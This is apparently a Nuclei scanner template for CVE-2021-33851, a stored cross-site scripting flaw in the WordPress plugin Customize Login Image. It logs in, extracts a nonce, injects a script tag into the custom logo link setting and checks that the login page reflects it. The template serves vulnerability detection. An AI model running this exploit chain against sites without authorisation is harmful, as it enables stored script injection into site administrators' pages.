id: CVE-2021-33851

info:
  name: Customize Login Image < 3.5.3 - Cross-Site Scripting
  author: 8authur
  severity: medium
  description: |
    A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
  reference:
    - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
    - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
    - https://wordpress.org/plugins/customize-login-image/
    - https://nvd.nist.gov/vuln/detail/cve-2021-33851
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-33851
    cwe-id: CWE-79
  metadata:
    verified: "true"
  tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=

      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_4 == 200'
          - 'contains(all_headers_4, "text/html")'
          - 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
        internal: true